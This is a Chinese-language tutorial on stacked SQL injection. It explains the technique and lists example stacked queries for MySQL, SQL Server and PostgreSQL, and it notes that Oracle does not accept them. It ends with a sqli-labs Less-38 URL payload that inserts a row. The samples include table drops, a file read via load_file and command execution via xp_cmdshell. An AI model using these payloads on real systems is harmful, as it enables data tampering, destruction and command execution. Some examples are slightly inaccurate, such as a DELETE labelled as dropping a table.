堆疊查詢注入

1.定義

Stacked injections(堆疊注入)從名詞的含義就可以看到應該是一堆sql語句(多條)一起執行。而在真實
的運用中也是這樣的,我們知道在mysql中,主要是命令列中,每一條語句結尾加;表示語句結束。這樣我們就想到了是不是可以多句一起使用。這個叫做stackedinjection。

2.原理

在SQL中，分號（;）是用來表示一條sql語句的結束。試想一下我們在 ; 結束一個sql語句後繼續構造下一條語句，會不會一起執行？因此這個想法也就造就了堆疊注入。而union injection（聯合注入）也是將兩條語句合併在一起，兩者之間有什麼區別麼？區別就在於union 或者union all執行的語句型別是有限的，可以用來執行查詢語句，而堆疊注入可以執行的是任意的語句。

3.侷限性

堆疊注入的侷限性在於並不是每一個環境下都可以執行，可能受到API或者資料庫引擎不支援的限制，當然了許可權不足也可以解釋為什麼攻擊者無法修改資料或者呼叫一些程式。

各個資料庫例項介紹（摘自文章連結）
本節我們從常用資料庫角度出發，介紹幾個型別的資料庫的相關用法。資料庫的基本操作，增刪查改。以下列出資料庫相關堆疊注入的基本操作。

Mysql

1.新建一表

select * from users where id=1;create table test like users;

執行成功，我們再去看一下是否新建成功表。

2.刪除上面新建的test表

select * from users where id=1;drop table test;
 

3.查詢資料

select * from users where id=1;select 1,2,3;

4.載入檔案

select * from users where id=1;select load_file('c:/tmpupbbn.php');

5.修改資料

select * from users where id=1;insert into users(id,username,password) values ('100','new','new');

Sql server

1.增加資料表

select * from test;create table sc3(ss CHAR(8));
 

2.刪除資料表

select * from test;drop table sc3;

3.查詢資料

select 1,2,3;select * from test;

4.修改資料

select * from test;update test set name='test' where id=3;

5.sqlserver中最為重要的儲存過程的執行

select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

Oracle

上面的介紹中我們已經提及，oracle不能使用堆疊注入，可以從圖中看到，當有兩條語句在同一行時，直接報錯。無效字元。後面的就不往下繼續嘗試了。

Postgresql

1.新建一個表

 select * from user_test;create table user_data(id DATE);

可以看到user_data表已經建好。

2.刪除上面新建的user_data表

select * from user_test;delete from user_data;

3.查詢資料

select * from user_test;select 1,2,3;

4.修改資料

select * from user_test;update user_test set name='modify' where name='張三';

演示案例

Sqlilabs-Less38-堆疊注入(多語句)

在執行select時的sql語句為：SELECT * FROM users WHERE id='$id' LIMIT 0,1
可以直接構造如下的payload：

http://127.0.0.1/sql/Less-38/index.php?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

再看資料表中的內容：可以看到less38已經新增。